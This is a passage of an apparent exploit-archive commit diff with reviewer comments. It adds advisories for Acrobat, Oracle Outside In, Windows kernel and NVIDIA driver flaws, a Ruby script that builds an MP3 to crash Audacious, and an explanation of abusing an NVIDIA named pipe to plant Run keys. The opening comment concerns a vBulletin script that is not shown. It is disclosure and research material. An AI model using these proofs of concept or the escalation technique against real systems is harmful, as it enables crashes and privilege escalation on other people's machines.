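Review bot: The header gives the affected version only as "Vbulletin 5.x", with no CVE id, advisory link or fixed release, so a reader cannot tell which installations are affected or what to upgrade to; add those references to the comment block. The script also runs without "use strict" and compares strings with the numeric operator in while($cmd=="exit"), which should be a string comparison.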
|
67
platforms/windows/dos/38787.txt
Executable file
|
@ -0,0 +1,67 @@
|
|||
#####################################################################################
|
||||
|
||||
Application: Acrobat Reader DC
|
||||
|
||||
Platforms: Windows
|
||||
|
||||
Versions: 15.008.20082.15957
|
||||
|
||||
CVE: CVE-2015-7622
|
||||
|
||||
Author: Francis Provencher of COSIG
|
||||
|
||||
Twitter: @COSIG_
|
||||
|
||||
|
||||
|
||||
#####################################################################################
|
||||
|
||||
1) Introduction
|
||||
2) Report Timeline
|
||||
3) Technical details
|
||||
4) POC
|
||||
|
||||
#####################################################################################
|
||||
|
||||
===============
|
||||
1) Introduction
|
||||
===============
|
||||
|
||||
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).[14]
|
||||
|
||||
The family comprises Acrobat Reader (formerly Adobe Reader), Acrobat (formerly Acrobat Exchange) and Acrobat.com. Thefreeware Acrobat Reader, available for several desktop and mobile platforms, can view, print and annotate PDF files.[15] Thecommercial proprietary Acrobat, available for Microsoft Windows and OS X only, can also create, edit, convert, digitally sign, encrypt, export and publish PDF files. Acrobat.com complements the family with a variety of enterprise content managementand file hosting services.
|
||||
|
||||
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
|
||||
|
||||
#####################################################################################
|
||||
|
||||
============================
|
||||
2) Report Timeline
|
||||
============================
|
||||
|
||||
2015-08-09: Francis Provencher of COSIG found the issue;
|
||||
2015-08-11: Francis Provencher of COSIG report vulnerability to PSIRT;
|
||||
2015-10-13: Adobe release a patch (APSB15-24)
|
||||
|
||||
#####################################################################################
|
||||
|
||||
============================
|
||||
3) Technical details
|
||||
============================
|
||||
|
||||
An error in the the PDF parser, could lead to a memory corruption when processing a crafted PDF with an invalid image.
|
||||
|
||||
Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires tricking a user into opening or previewing a malicious file.
|
||||
|
||||
#####################################################################################
|
||||
|
||||
===========
|
||||
|
||||
4) POC
|
||||
|
||||
===========
|
||||
|
||||
http://protekresearchlab.com/exploits/COSIG-2015-001.pdf
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38787.zip
|
||||
|
||||
###############################################################################
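Review bot: Section 3 describes the fault only as "an invalid image" in the PDF parser, without naming the image filter, the field or the crash location, so the write-up cannot be used to recognise the condition or to confirm that the patch (APSB15-24) covers it; 38788.txt in this commit names the decoder and field, and this file should do the same. The Introduction is pasted from Wikipedia with the footnote markers "[14]" and "[15]" and with joined words ("Thefreeware", "Thecommercial", "managementand") left in.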
|
63
platforms/windows/dos/38788.txt
Executable file
|
@ -0,0 +1,63 @@
|
|||
#####################################################################################
|
||||
|
||||
Application: Oracle Outside In
|
||||
|
||||
Platforms: Windows
|
||||
|
||||
Versions: 8.5.2
|
||||
|
||||
CVE: CVE-2015-4877
|
||||
|
||||
Author: Francis Provencher of COSIG
|
||||
|
||||
Twitter: @COSIG_
|
||||
|
||||
#####################################################################################
|
||||
|
||||
1) Introduction
|
||||
2) Report Timeline
|
||||
3) Technical details
|
||||
4) POC
|
||||
|
||||
#####################################################################################
|
||||
|
||||
===============
|
||||
1) Introduction
|
||||
===============
|
||||
|
||||
Oracle Outside In Technology provides software developers with a comprehensive solution to access, transform, and control the contents of over 500 unstructured file formats. From the latest office suites, such as Microsoft Office 2007, to specialty formats and legacy files, Outside In Technology provides software developers with the tools to transform unstructured files into controllable information.
|
||||
|
||||
(http://www.oracle.com/us/technologies/embedded/025613.htm)
|
||||
|
||||
#####################################################################################
|
||||
|
||||
============================
|
||||
2) Report Timeline
|
||||
============================
|
||||
|
||||
2015-06-09: Francis Provencher of COSIG found the issue;
|
||||
2015-06-11: Francis Provencher of COSIG report vulnerability to Oracle SA;
|
||||
2015-10-18: Oracle release a patch for this issue;
|
||||
|
||||
#####################################################################################
|
||||
|
||||
============================
|
||||
3) Technical details
|
||||
============================
|
||||
|
||||
An heap memory corruption occured when Outside In decode (DCTDecode) a PDF with a JPEG that have an invalid “Heigth” value.
|
||||
|
||||
Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires tricking a user into opening or previewing a malicious file.
|
||||
|
||||
#####################################################################################
|
||||
|
||||
===========
|
||||
|
||||
4) POC
|
||||
|
||||
===========
|
||||
|
||||
http://protekresearchlab.com/exploits/COSIG-2015-002.pdf
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38788.zip
|
||||
|
||||
###############################################################################
|
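Review bot: The file header shows this plain-text advisory being added as an executable file; a .txt write-up should be committed without the execute bit. In the technical details sentence, "occured" and "Heigth" are misspelled ("occurred", "Height"), which defeats keyword searches for the DCTDecode height issue. Suggest correcting both if the archive policy allows edits to submitted text.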
63
platforms/windows/dos/38789.txt
Executable file
|
@ -0,0 +1,63 @@
|
|||
#####################################################################################
|
||||
|
||||
Application: Oracle Outside In
|
||||
|
||||
Platforms: Windows
|
||||
|
||||
Versions: 8.5.2
|
||||
|
||||
CVE: CVE-2015-4878
|
||||
|
||||
Author: Francis Provencher of COSIG
|
||||
|
||||
Twitter: @COSIG_
|
||||
|
||||
#####################################################################################
|
||||
|
||||
1) Introduction
|
||||
2) Report Timeline
|
||||
3) Technical details
|
||||
4) POC
|
||||
|
||||
#####################################################################################
|
||||
|
||||
===============
|
||||
1) Introduction
|
||||
===============
|
||||
|
||||
Oracle Outside In Technology provides software developers with a comprehensive solution to access, transform, and control the contents of over 500 unstructured file formats. From the latest office suites, such as Microsoft Office 2007, to specialty formats and legacy files, Outside In Technology provides software developers with the tools to transform unstructured files into controllable information.
|
||||
|
||||
(http://www.oracle.com/us/technologies/embedded/025613.htm)
|
||||
|
||||
#####################################################################################
|
||||
|
||||
============================
|
||||
2) Report Timeline
|
||||
============================
|
||||
|
||||
2015-06-09: Francis Provencher of COSIG found the issue;
|
||||
2015-06-11: Francis Provencher of COSIG report vulnerability to Oracle SA;
|
||||
2015-10-18: Oracle release a patch for this issue;
|
||||
|
||||
#####################################################################################
|
||||
|
||||
============================
|
||||
3) Technical details
|
||||
============================
|
||||
|
||||
A Use-After-Free memory corruption occured when Outside In decode (JBIG2Decode) a stream with an invalid image.
|
||||
|
||||
Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires tricking a user into opening or previewing a malicious file.
|
||||
|
||||
#####################################################################################
|
||||
|
||||
===========
|
||||
|
||||
4) POC
|
||||
|
||||
===========
|
||||
|
||||
http://protekresearchlab.com/exploits/COSIG-2015-003.pdf
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38789.zip
|
||||
|
||||
###############################################################################
|
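Review bot: The header lists "Versions: 8.5.2" and the timeline records a patch on 2015-10-18, but nothing in the entry says which release or vendor advisory carries the fix, so a reader cannot tell from this file whether an installation is still affected by CVE-2015-4878. Suggest adding a fixed-version or advisory line under the timeline.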
19
platforms/windows/dos/38791.rb
Executable file
|
@ -0,0 +1,19 @@
|
|||
# Exploit Title: Audacious 3.7 ID3 Local Crash PoC
|
||||
# Date: 11-20-2015
|
||||
# Exploit Author: Antonio Z.
|
||||
# Vendor Homepage: http://audacious-media-player.org/
|
||||
# Software Link: http://audacious-media-player.org/download | http://distfiles.audacious-media-player.org/audacious-3.7-win32.zip
|
||||
# Version: 3.7
|
||||
# Tested on: Windows 7 SP1 x64, Windows 8.1 x64, Windows 10 x64, Debian 8.2 x86-x64
|
||||
# Comment: Issue was reported: http://redmine.audacious-media-player.org/issues/595
|
||||
|
||||
require 'fileutils'
|
||||
require 'mp3info'
|
||||
|
||||
evil = 'A' * 1048576
|
||||
|
||||
FileUtils.cp 'Test_Case.mp3', 'Test_Case_PoC.mp3'
|
||||
|
||||
Mp3Info.open('Test_Case_PoC.mp3') do |mp3|
|
||||
mp3.tag.artist = evil
|
||||
end
|
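Review bot: The script requires 'mp3info' and copies 'Test_Case.mp3', but the header comments mention neither prerequisite and the input file is not among the files visible in this diff, so FileUtils.cp will raise when the file is absent. Suggest a comment line naming the gem and the expected input. The header could also state that the oversized field is the ID3 artist tag (1048576 bytes), since that is the detail the linked issue 595 needs for a fix.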
8
platforms/windows/dos/38793.txt
Executable file
|
@ -0,0 +1,8 @@
|
|||
Source: https://code.google.com/p/google-security-research/issues/detail?id=516
|
||||
|
||||
The attached testcase crashes Windows 7 32-bit due to a pool buffer overflow in an ioctl handler. Enabling special on ndis.sys netio.sys and ntoskrnl helps to track down the issue, however it will crashes due to a bad pool header without special pool as well.
|
||||
---
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38793.zip
|
||||
|
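Review bot: The description never names the driver or the ioctl behind the pool buffer overflow; it only lists ndis.sys, netio.sys and ntoskrnl as modules to place under special pool, so the entry cannot be matched to a fix or a detection. Suggest adding the affected component from the linked issue 516. The same sentence reads "Enabling special on ndis.sys" (the word "pool" is missing) and "it will crashes".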
10
platforms/windows/dos/38794.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
Source: https://code.google.com/p/google-security-research/issues/detail?id=510
|
||||
|
||||
The attached poc crashes 32-bit Windows 7 with a screen resolution of 1024x768 and 32bit color depth. The crash occurs during a memmove opperation while copying the cursor content from unmapped memory. This could potentially be used by an attacker to leak kernel memory.
|
||||
|
||||
When reproducing this issue in VMWare, it is necessary to remove VMWare tools. In QEMU the issue reproduces reliably.
|
||||
---
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38794.zip
|
||||
|
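Review bot: The file is added under platforms/windows/dos, yet the body says the faulting memmove "could potentially be used by an attacker to leak kernel memory"; if that holds, the impact belongs in the entry's classification or title and not only in the prose. The affected kernel component is not named, and "opperation" is misspelled.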
8
platforms/windows/dos/38795.txt
Executable file
|
@ -0,0 +1,8 @@
|
|||
Source: https://code.google.com/p/google-security-research/issues/detail?id=509
|
||||
|
||||
The attached testcase crashes Window 7 32-bit with Special Pool enabled on win32k.sys due to a use-after-free condition. The bug appears to be a race condition between two threads and multiple runs on the PoC might be required to trigger the bug. This is more reliable on systems with multiple cores.
|
||||
---
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38795.zip
|
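Review bot: The text says the use-after-free is a race between two threads that may need multiple runs to trigger, but it gives no expected bugcheck or faulting routine, so someone verifying a patch cannot tell "fixed" from "did not trigger this time". Suggest adding the crash signature from the linked issue 509. "Window 7 32-bit" should also read "Windows 7 32-bit".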
8
platforms/windows/dos/38796.txt
Executable file
|
@ -0,0 +1,8 @@
|
|||
Source: https://code.google.com/p/google-security-research/issues/detail?id=505
|
||||
|
||||
The attached testcase triggers a use-after-free condition in win32k. The attached debugger output was triggered on Windows 7 with Special Pool enabled on win32k.sys.
|
||||
---
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38796.zip
|
||||
|
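Review bot: The text refers to "the attached debugger output", but the file holds only the description and the 38796.zip link, so the reference dangles unless the output is inside the archive. Suggest either saying so or inlining the relevant stack. Unlike the neighbouring entries, this one also omits whether the Windows 7 target was 32-bit.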
53
platforms/windows/local/38792.txt
Executable file
|
@ -0,0 +1,53 @@
|
|||
Source: https://code.google.com/p/google-security-research/issues/detail?id=515
|
||||
|
||||
NVIDIA: Stereoscopic 3D Driver Service Arbitrary Run Key Creation
|
||||
Platform: Windows, NVIDIA Service Version 7.17.13.5382
|
||||
Class: Elevation of Privilege, Remote Code Execution
|
||||
|
||||
Summary:
|
||||
The 3D Vision service nvSCPAPISvr.exe installed as part of typical driver installations runs at Local System and has an insecure named pipe server. One of the commands in the server can be used to set an Explorer Run key for the system which would allow a user to get code executing in the session of any other user who logs on to the same machine leading to elevation of privilege. In Windows Domain environments it would also be possible to exploit the vulnerability between machines if the attacker has access to a valid user account on one domain joined machine.
|
||||
|
||||
Description:
|
||||
|
||||
|
||||
The NVIDIA Stereoscopic 3D Driver Service exposes the named pipe “stereosvrpipe” which implements a simple command response service. One of the commands (number 2) will write an arbitrary value to a fixed set of two registry keys, one which is specific to NVIDIA (no effort has been made to determine if this could be abused) and also the HKEY_LOCAL_MACHINE explorer Run key. This Run key is inspected when a new copy of the Windows Explorer shell is started, any values are treated as command lines to execute. Therefore any user on the system can create an arbitrary run key entry and get their own commands to execute in the security context of any other user (such as an administrator) who logs into the system to interact with the desktop.
|
||||
|
||||
The named pipe is not locked down to prevent abuse, in fact it’s given a NULL DACL which means that any user can open the device, although it can’t be exploited from typical application sandboxes such as Chrome or IE. When the pipe is created no attempt is made to prevent remote access to the pipe (by passing the PIPE_REJECT_REMOTE_CLIENTS) flag. This means that the service can also be exposed to external systems, assuming the client has valid credentials (or is running within a session which can use Integrated Authentication). This is probably most dangerous in a Windows Domain Environment.
|
||||
|
||||
Finally the service has a potentially memory corruption issue when handling the registry key path. When reading a string from the named pipe the code doesn’t ensure the string is NUL terminated. Instead it’s passed to a function to verify that the path is prefixed with one of the valid registry keys. The code for this check is roughly:
|
||||
|
||||
BOOLEAN is_string_prefixed(char *read_str, char *prefix)
|
||||
{
|
||||
int ret = FALSE;
|
||||
int prefix_len = strlen(prefix);
|
||||
if ( read_str && strlen(read_str) >= prefix_len )
|
||||
{
|
||||
char old_char = read_str[prefix_len];
|
||||
read_str[prefix_len] = 0;
|
||||
if ( !_strnicmp(read_str, prefix, prefix_len) )
|
||||
ret = TRUE;
|
||||
read_str[prefix_len] = old_char;
|
||||
}
|
||||
return ret;
|
||||
}
|
||||
|
||||
If the passed string is not NUL terminated then this code will cause temporary memory corruption. For example if the passed string is exactly the same size as the prefix then the code will write the 0 one character off the end of the allocated buffer. Also if the read string’s size is less than the length of the prefix but the original allocation has non NUL data the zero could be written into another valid block. As the function restores the original value it’s unlikely to be reliably exploitable. However there’s actually no reason to do the overwrite as the code is already using strnicmp which will only check up to the prefix size.
|
||||
|
||||
In summary there are at least 4 issues with the service:
|
||||
1) Service exposes the ability to create an arbitrary system wide run key entry
|
||||
2) When creating the named pipe the PIPE_REJECT_REMOTE_CLIENTS is not passed meaning it can be connected to remotely to exploit the vulnerability.
|
||||
3) The pipe has a NULL DACL which allows any user to connect to it
|
||||
4) The processing of the registry key path has potential for memory corruption.
|
||||
|
||||
Proof of Concept:
|
||||
I’ve provided a proof of concept, in C# which will need to be compiled. You can use the csc compiler which comes with the .NET framework.
|
||||
|
||||
Expected Result:
|
||||
The pipe service can't be connected to or it doesn't write the registry key.
|
||||
|
||||
Observed Result:
|
||||
A new run key is present in HKLM\Software\Microsoft\Windows\CurrentVersion\Run which executes notepad (note on 64bit systems it will actually be under the Wow6432Node as the service is 32bit, but it will still execute).
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38792.zip
|
||||
|
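Review bot: "Proof of Concept:" appears twice, first introducing the C# source that "will need to be compiled" and again above the 38792.zip link; merge the two so it is clear the C# file is the content of the archive. The Class line lists Remote Code Execution while the file lands under platforms/windows/local, which deserves a comment given summary item 2 (PIPE_REJECT_REMOTE_CLIENTS not passed). On the quoted is_string_prefixed, note that strlen(read_str) already reads past the buffer when the input is not NUL terminated, before the temporary write the text discusses, so the remediation section should call for a length-bounded read plus a bounded _strnicmp with no in-place write, alongside a restrictive DACL and PIPE_REJECT_REMOTE_CLIENTS.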